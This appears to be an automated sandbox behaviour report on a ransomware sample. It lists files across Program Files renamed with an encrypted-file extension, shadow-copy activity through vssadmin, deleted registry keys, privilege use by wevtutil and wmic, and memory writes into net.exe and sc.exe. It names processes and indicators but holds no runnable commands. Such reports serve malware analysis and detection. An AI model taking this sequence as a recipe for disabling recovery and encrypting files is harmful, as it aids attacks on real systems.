File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Trial-ppd.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_OgAAADoAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarWideTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-cn\ui-strings.js.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-30_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailBadge.scale-125.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_selected_18.svg.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_MAAAADAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_DAAAAAwAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsSmallTile.contrast-black_scale-100.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\en-us\oregres.dll.mui.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_NgAAADYAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookMedTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-256.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\profilePic.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\es-es\ui-strings.js.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_LAAAACwAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\fr-FR\micaut.dll.mui.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_FgAAABYAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-ppd.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_IgAAACIAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-white\LargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\LargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial1-ppd.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_EAAAABAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-200_contrast-high.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AgAAAAIAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Retail-ul-oob.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\ar\msipc.dll.mui.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_IAAAACAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\AppxSignature.p7x C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7813_40x40x32.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\LinkedInboxSmallTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSmallTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_BAAAAAQAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Grace-ul-oob.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\5671_20x20x32.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\text_2x.png.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremDemoR_BypassTrial365-ppd.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteAppList.scale-150.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_ZH-HK.respack C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\2_32x32x32.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_2015.7906.42257.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ja-jp\ui-strings.js.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jni.h.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-white\Square44x44Logo.targetsize-256_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubSplashScreen.scale-100_contrast-black.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\_Resources\8.rsrc C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Generic-Light.scale-200.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\scanAppLogo.png.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_CgAAAAoAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\animations\OneNoteFRE_SaveAutomatically_LTR_Phone.mp4 C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\LargeTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-hk_get.svg.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_PgAAAD4AAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Retail-pl.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xsl.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_MgAAADIAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\ja-JP\wmplayer.exe.mui C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookLargeTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\selector.js.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_NgAAADYAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailLargeTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ms_get.svg.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AgAAAAIAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-125_kzf8qxf38zg5c\SkypeApp\Assets\SkypeLargeTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\Weather_TileLargeSquare.scale-100.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSmallTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-white_targetsize-48.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad\osknumpadbase.xml C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_PgAAAD4AAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2060 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 1064 wrote to memory of 1192 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2060 wrote to memory of 512 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 512 wrote to memory of 3580 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2060 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 924 wrote to memory of 1480 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2060 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 2080 wrote to memory of 4044 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2060 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 4020 wrote to memory of 3416 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2060 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 3216 wrote to memory of 2448 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2060 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 2836 wrote to memory of 2380 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2060 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 1060 wrote to memory of 3244 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2060 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\net.exe
PID 2176 wrote to memory of 3156 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2060 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
